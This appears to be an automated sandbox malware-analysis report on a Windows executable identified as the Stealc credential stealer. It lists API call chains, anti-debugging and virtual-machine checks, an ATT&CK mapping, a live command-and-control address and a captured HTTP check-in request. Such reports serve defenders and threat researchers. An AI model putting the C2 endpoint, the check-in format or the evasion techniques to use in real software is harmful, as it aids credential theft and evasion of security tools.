              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FCD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00FCDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FB16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00FD1BF0
              Source: file.exe, file.exe, 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1746029554.0000000001BF6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746029554.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25257)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25264)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25110)
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25128)
              Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe | File opened: SICE
              Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01378868 rdtsc 0_2_01378868
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB4A60 VirtualProtect 00000000,00000004,00000100,? 0_2_00FB4A60
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD6390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD6390 mov eax, dword ptr fs:[00000030h] 0_2_00FD6390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD2AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FD2AD0
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: Process Memory Space: file.exe PID: 6724, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_00FD46A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00FD4610
              Source: file.exe, file.exe, 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 2RProgram Manager
              Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FD2D60
              Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FD2B60
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FD2A40
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FD2C10

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 6724, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

              Source: Yara match | File source: 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 6724, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP
              MITRE ATT&CK matrix, listed per tactic; the number in parentheses is the count of signatures mapped to that technique in this analysis, techniques without a number were not matched:

              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
              Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
              Execution: Command and Scripting Interpreter (2), Native API (13), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
              Persistence: Create Account (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
              Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
              Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
              Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
              Discovery: System Time Discovery (2), Security Software Discovery (651), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
              Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
              Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.php$XV | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpi | file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/L | file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/ws | file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php$XV | file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/u | file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1562041
                                Start date and time:2024-11-25 06:35:08 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 8s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 119
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                No simulations
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC Stealer | 185.215.113.16
file.exe | malicious | LummaC Stealer | 185.215.113.16
No context
No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.944312558078617
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'771'008 bytes
                                MD5:ec2b785f84c4c57983920f431a8f78ce
                                SHA1:cfc54b34762d4a0e5036a9ea5566865721cf6a9f
                                SHA256:8c03b7c9bc22de662f3340049dd7fc98a640b99c0e4b58c1bf3a0d334be53ba8
                                SHA512:c0dffb2c75fbee616fa11a3bf017e3478a913f9cfa535d259c48f2b8084eecae97b968374256066f51b77d00d0f4d0ce610fd798d8dc0b89ca314ff40f37c170
                                SSDEEP:49152:rcK7f3mEtO89aTh2aK2MbMl3zoRlJULDWcAn:rcK7f3man9aYoEMljalem
                                TLSH:6B85331EEFCB81D8C3AD54B47F62105AA7A91315286008D1EB76681ACC7319BBCD3D9E
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0xa7d000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F43792AA61Ah
                                pmulhuw mm3, qword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no printable name) | 0x1000 | 0x249000 | 0x16200 | 6b27efa8aa047da9607979d404edca67 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 5e9df45403f220f1fa266fc9915d1efe | False | 0.794921875 | data | 6.10420202828602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no printable name) | 0x24c000 | 0x299000 | 0x200 | e12f093340bce7c6508c28c7861301f6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
quxdhurw | 0x4e5000 | 0x197000 | 0x196800 | b0d328b46d6ec18e3c0a824666a7f0df | False | 0.9946667435424354 | data | 7.9529360698674845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mjwebezn | 0x67c000 | 0x1000 | 0x400 | c2a5486ed9e3d75819f6ce42da6194a3 | False | 0.7646484375 | data | 5.975743947064024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x67d000 | 0x3000 | 0x2200 | 9ca0343007c85b815624e4e23926e7af | False | 0.06307444852941177 | DOS executable (COM) | 0.7783992948726706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x67b4dc | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T06:36:05.519429+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 06:36:03.622224092 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 25, 2024 06:36:03.741846085 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 25, 2024 06:36:03.741960049 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 25, 2024 06:36:03.742223024 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 25, 2024 06:36:03.861721992 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 25, 2024 06:36:05.075124025 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 25, 2024 06:36:05.075222015 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 25, 2024 06:36:05.078025103 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 25, 2024 06:36:05.197520018 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 25, 2024 06:36:05.519344091 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Nov 25, 2024 06:36:05.519428968 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Nov 25, 2024 06:36:08.839973927 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 6724 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 06:36:03.742223024 CET | 90 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
Nov 25, 2024 06:36:05.075124025 CET | 203 | IN | HTTP/1.1 200 OK
                                Date: Mon, 25 Nov 2024 05:36:04 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
Nov 25, 2024 06:36:05.078025103 CET | 412 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                                Host: 185.215.113.206
                                Content-Length: 210
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 45 30 38 30 31 38 35 33 42 37 36 37 31 38 34 37 36 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a
                                Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"0CE0801853B7671847631------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
Nov 25, 2024 06:36:05.519344091 CET | 210 | IN | HTTP/1.1 200 OK
                                Date: Mon, 25 Nov 2024 05:36:05 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=



                                Target ID:0
                                Start time:00:36:00
                                Start date:25/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xfb0000
                                File size:1'771'008 bytes
                                MD5 hash:EC2B785F84C4C57983920F431A8F78CE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
